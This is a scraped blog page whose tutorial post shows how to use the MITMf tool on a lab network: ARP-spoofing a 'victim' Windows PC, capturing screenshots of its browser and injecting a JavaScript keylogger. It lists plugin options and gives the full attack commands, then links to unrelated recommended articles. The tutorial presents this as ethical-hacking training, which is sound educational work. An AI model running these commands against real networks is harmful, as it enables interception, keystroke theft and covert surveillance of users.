MITM - Capturing Screen Of Target & Injecting a Keylogger

ScreenShotter Plugin:

ScreenShotter:

  Uses HTML5 Canvas to render an accurate screenshot of a clients browser

  --screen              Load plugin 'ScreenShotter'

  --interval SECONDS    Interval at which screenshots will be taken (default 10 seconds)

Inject Plugin:

Inject:

  Inject arbitrary content into HTML content

  --inject              Load plugin 'Inject'

  --js-url JS_URL       URL of the JS to inject

  --js-payload JS_PAYLOAD

                        JS string to inject

  --js-file JS_FILE     File containing JS to inject

  --html-url HTML_URL   URL of the HTML to inject

  --html-payload HTML_PAYLOAD

                        HTML string to inject

  --html-file HTML_FILE

                        File containing HTML to inject

  --per-domain          Inject once per domain per client.

  --rate-limit RATE_LIMIT

                        Inject once every RATE_LIMIT seconds per client.

  --count-limit COUNT_LIMIT

                        Inject only COUNT_LIMIT times per client.

  --white-ips IP        Inject content ONLY for these ips (comma seperated)

  --black-ips IP        DO NOT inject content for these ips (comma seperated)

  --white-domains DOMAINS

                        Inject content ONLY for these domains (comma seperated)

  --black-domains DOMAINS

                        DO NOT inject content for these domains (comma seperated)

Test the ScreenShotter on Victim Windows PC.

python2 mitmf.py --arp --spoof --gateway 10.0.0.1 --targets 10.0.0.22 -i eth0 --screen

It works perfectly.

JSKeylogger Plugin:

JSKeylogger:

  Injects a javascript keylogger into clients webpages

  --jskeylogger         Load plugin 'JSKeylogger'

Usage:

python2 mitmf.py --arp --spoof --gateway 10.0.0.1 --target 10.0.0.22 -i eth0 --jskeylogger

It works...

Ethical Hacking - NETWORK PENETRATION TESTING(20)的更多相关文章

  1. Ethical Hacking - NETWORK PENETRATION TESTING(15)

    ARP Poisoning - arpspoof Arpspoof is a tool part of a suit called dsniff, which contains a number of ...

  2. Ethical Hacking - NETWORK PENETRATION TESTING(22)

    MITM - Wireshark WIreshark is a network protocol analyser that is designed to help network administa ...

  3. Ethical Hacking - NETWORK PENETRATION TESTING(14)

    MITM - ARP Poisoning Theory Man In The Middle Attacks - ARP Poisoning This is one of the most danger ...

  4. Ethical Hacking - NETWORK PENETRATION TESTING(13)

    Nmap Nmap is a network discovery tool that can be used to gather detailed information about any clie ...

  5. Ethical Hacking - NETWORK PENETRATION TESTING(12)

    Post Connection Attacks Sophisticated attacks that can be used after connecting to the target AP. Ga ...

  6. Ethical Hacking - NETWORK PENETRATION TESTING(11)

    Securing your Network From the Above Attacks. Now that we know how to test the security of all known ...

  7. Ethical Hacking - NETWORK PENETRATION TESTING(10)

    WPA Craking WPA was designed to address the issues in WEP and provide better encryption. The main is ...

  8. Ethical Hacking - NETWORK PENETRATION TESTING(8)

    WEP Cracking Basic case Run airdump-ng to log all traffic from the target network. airodump-ng --cha ...

  9. Ethical Hacking - NETWORK PENETRATION TESTING(7)

    Gaining Access to encrypted networks Three main encryption types: 1. WEP 2.WPA 3.WPA2 WEP Cracking W ...

随机推荐

  1. 关于margin外边距合并的问题

    一 .兄弟元素margin外边距合并演示   当两个垂直方向相邻的兄弟元素都为常规流块盒,他们之间垂直方向的外边距不是两者之和,而是取两者中的最大值.这种现象被称为相邻的兄弟元素垂直方向外边距合并. ...

  2. 学习Linux必须掌握的一个知识-i节点

    linux文件系统是Linux系统的心脏部分,提供了层次结构的目录和文件.文件系统将磁盘空间划分为每1024个字节一组,称为块(也有用512字节为一块的,如:SCOXENIX).编号从0到整个磁盘的最 ...

  3. Java CRC16 MODBUS校验算法实现

    /** * CRC校验算法工具类 */ public class CRCUtil { public static String getCRC(String data) { data = data.re ...

  4. 完美解决asp.net core 3.1 两个AuthenticationScheme(cookie,jwt)共存在一个项目中

    内容 在我的项目中有mvc controller(view 和 razor Page)同时也有webapi,那么就需要网站同时支持2种认证方式,web页面的需要传统的cookie认证,webapi则需 ...

  5. CentOS 安装 VMware Tools 详细方法

    点击虚拟机,选择安装vmware Tools工具 弹出上面的界面,右键选择奖上面的vmwaraTools.tar.gz解压到你要解压的目录下面 记得一定要使用root用户,进入到解压的目录 然后执行 ...

  6. npm -v 报错:Error: EPERM: operation not permitted, mkdir 'C:\soft\nodejs'

    npm -v 报错:Error: EPERM: operation not permitted, mkdir 'C:\soft\nodejs' 起因:原本安装node在C盘soft文件夹下,按node ...

  7. 算法岗面试题:模型的bias和variance是什么?用随机森林举例

    校招在即,准备准备一些面试可能会用到的东西吧.希望这次面试不会被挂. 基本概念 说到机器学习模型的误差,主要就是bias和variance. Bias:如果一个模型的训练错误大,然后验证错误和训练错误 ...

  8. webpack模块打包简易版

    webpack基本使用流程(react) 1.安装webpack脚手架 cnpm install webpack webpack-cli -D 2.安装处理css的loader cnpm instal ...

  9. git bash中提示 bash:node: command not found

    昨天小伙伴私信,git bash以及windows 的cmd命令行下均无法运行node npm. 究其原因是环境变量的问题.解决步骤: 1>在"此电脑"中右击,选择" ...

  10. c语言学习笔记第二章———入门

    B站有视频演示 2.1软件安装 推荐软件 1.dev-c++ 下载链接:(腾讯软件管家的下载地址) https://sm.myapp.com/original/Development/Dev-Cpp_ ...